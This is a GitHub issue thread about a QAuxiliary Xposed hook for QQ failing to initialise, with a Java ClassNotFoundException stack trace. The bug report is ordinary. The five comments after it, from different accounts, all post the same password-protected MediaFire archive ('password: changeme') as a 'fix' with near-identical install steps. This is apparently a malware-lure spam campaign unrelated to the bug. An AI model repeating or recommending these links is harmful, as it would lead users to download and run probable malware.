### ISSUE TITLE
[Bug] 屏蔽群昵称图标无法使用

### ISSUE THREAD

**Issue by EatHatsuneShallots** [cinit/QAuxiliary#1153]
### 复现步骤 / Steps to reproduce

选择任意精简项目

### 预期行为 / Expected behaviour

初始化成功

### 实际行为 / Actual behaviour/

初始化失败

### 你使用的Xposed框架 / Xposed Framework you used

ONPatch 0.0.7

### 你使用的安卓系统版本 / Your Android version

10

### QQ(TIM) 版本 / QQ(TIM) Version

9.0.60

### 模块版本 / Module Version

fd17554a4e2c01244a9fc778f0c5fd8933546bbc

### 版本和其他要求 / Version and Other Requirements

- [ ] 我正在使用最新 CI 调试版本且启用详细日志 / I am using latest debug CI version of QAuxiliary and enable verbose log
- [X] 我使用的 QQ 是官方发布的正式版本，而非修改版或测试版 / The QQ I am using is an official release version, not a modified or beta version
- [X] 我已经在 [Issue Tracker](https://github.com/cinit/QAuxiliary/issues) 中找过我要提出的问题，没有找到相同问题。重复问题会被关闭。
- [X] 我已知晓并同意，此处仅用于汇报主程序中存在的问题。若这个 Issue 是关于其他非程序本身问题，则我的 Issue 可能会被无条件自动关闭或/并锁定。
- [X] 我已知晓并同意，如果我不按照模板提供的指示进行填写，则我的 Issue 可能会被无条件删除。

### 日志 / Logs

```
1.5.2.r2396.fd17554
QQ9.0.60(6478)
PID: 15462, UID: 10225
cn.lliiooll.hook.AntiNickBlock
isInitialized: true
isInitializationSuccessful: false
isEnabled: true
isAvailable: true
isPreparationRequired: false
errors: 1
java.lang.ClassNotFoundException: Didn't find class "com.tencent.mobileqq.vas.vipicon.g" on path: DexPathList[[zip file "/data/app/com.tencent.mobileqq-FJzEI6XzlsBsQyeJZFaKDw==/base.apk", dex file "/data/user/0/com.tencent.mobileqq/cache/onpatch/origin/p_285168751.dex"],nativeLibraryDirectories=[/data/app/com.tencent.mobileqq-FJzEI6XzlsBsQyeJZFaKDw==/lib/arm64, /data/app/com.tencent.mobileqq-FJzEI6XzlsBsQyeJZFaKDw==/base.apk!/lib/arm64-v8a, /system/lib64, /hw_product/lib64, /system/product/lib64, /prets/lib64]]
	at dalvik.system.BaseDexClassLoader.findClass(BaseDexClassLoader.java:209)
	at java.lang.ClassLoader.loadClass(ClassLoader.java:379)
	at java.lang.ClassLoader.loadClass(ClassLoader.java:312)
	at com.github.kyuubiran.ezxhelper.utils.ClassUtilKt.loadClass(ClassUtil.kt:16)
	at com.github.kyuubiran.ezxhelper.utils.ClassUtilKt.loadClass$default(ClassUtil.kt:14)
	at cn.lliiooll.hook.AntiNickBlock.initOnce(AntiNickBlock.kt:95)
	at io.github.qauxv.hook.BaseFunctionHook.initialize(BaseFunctionHook.kt:64)
	at io.github.qauxv.core.InjectDelayableHooks.stepForMainBackgroundStartup(InjectDelayableHooks.java:249)
	at io.github.qauxv.core.MainHook.performHook(MainHook.java:136)
	at io.github.qauxv.poststartup.StartupRoutine.execPostStartupInit(StartupRoutine.java:79)
	at io.github.qauxv.poststartup.StartupHook.execStartupInit(StartupHook.java:73)
	at io.github.qauxv.poststartup.StartupHook$1.afterHookedMethod(StartupHook.java:143)
	at io.github.qauxv.util.xpcompat.WrappedCallbacks$WrappedHookCallback.afterHookedMember(WrappedCallbacks.java:81)
	at io.github.qauxv.loader.sbl.xp51.Xp51HookWrapper$Xp51HookCallback.afterHookedMethod(Xp51HookWrapper.java:142)
	at de.robv.android.xposed.XposedBridge$LegacyApiSupport.handleAfter(XposedBridge.java:447)
	at org.lsposed.lspd.impl.LSPosedBridge$NativeHooker.callback(LSPosedBridge.java:192)
	at LSPHooker_.run(Unknown Source:11)
	at com.tencent.qqnt.startup.NtStartupDispatcher.c(P:6)
	at com.tencent.qqnt.startup.NtStartupDispatcher.a(P:1)
	at com.tencent.qqnt.startup.NtStartupDispatcher$dispatcher$2.invoke(P:2)
	at com.tencent.qqnt.startup.NtStartupDispatcher$dispatcher$2.invoke(P:1)
	at com.tencent.qqnt.startup.NtStartupExecutor$sam$java_lang_Runnable$0.run(Unknown Source:17)
	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1167)
	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:641)
	at java.lang.Thread.run(Thread.java:929)


```

**Comment by tonywk** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by AnaSousa314** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by deverchettychandrashekar** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by AnaSousa314** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mohamed-elsankary** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
